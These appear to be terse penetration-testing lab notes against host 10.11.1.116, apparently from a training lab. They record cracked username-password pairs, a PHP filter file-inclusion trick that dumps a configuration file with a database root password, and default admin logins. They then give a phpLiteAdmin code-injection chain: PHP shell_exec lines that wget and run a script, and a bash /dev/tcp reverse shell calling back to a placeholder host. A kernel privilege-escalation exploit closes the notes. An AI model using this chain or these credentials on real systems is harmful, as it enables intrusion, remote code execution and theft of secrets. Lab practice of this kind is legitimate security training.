http://10.11.1.116/db/phpliteadmin.

php
password "admin"

aaron:italia99
accasia:WindRunner
deanna:marianna
jpotter:vipsu

https://www.exploit-db.com/exploits/25971

http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=php://
filter/convert.base64-encode/resource=../Configuration.php

<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "99bbVDdorGzfZJun";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg;
*.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf;
*.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>

http://10.11.1.116/administrator/

user: admin
passw: admin

php lite admin:

https://www.exploit-db.com/exploits/24044

Proof of Concept:

1. We create a db named "hack.php".

(Depending on Server configuration sometimes it will not work and the name for the
db will be "hack.sqlite". Then simply try to rename the database / existing
database to "hack.php".)
The script will store the sqlite database in the same directory as
phpliteadmin.php.

2. Now create a new table in this database and insert a text field with the default
value:
1) <?php echo shell_exec("wget http://IP/reverse.sh -O /tmp/reverseshell.sh");?>
2) <?php echo shell_exec("chmod 777 /tmp/reverseshell.sh");?>
3) <?php echo shell_exec("/bin/bash /tmp/reverseshell.sh");?>

reverseshell.sh
bash -i >& /dev/tcp/IP/4444 0>&1

3. Now we run hack.php

10.11.1.116/administrator/alerts/alertConfigField.php?
urlConfig=../../../../../../../../../usr/local/databases/hack.php

privesc:

Kernel
Linux version 4.4.0-116-generic - https://www.exploit-db.com/exploits/44298 CVE-
2017-16995

gcc 44298.c -o exploit

wget
chmod
./exploit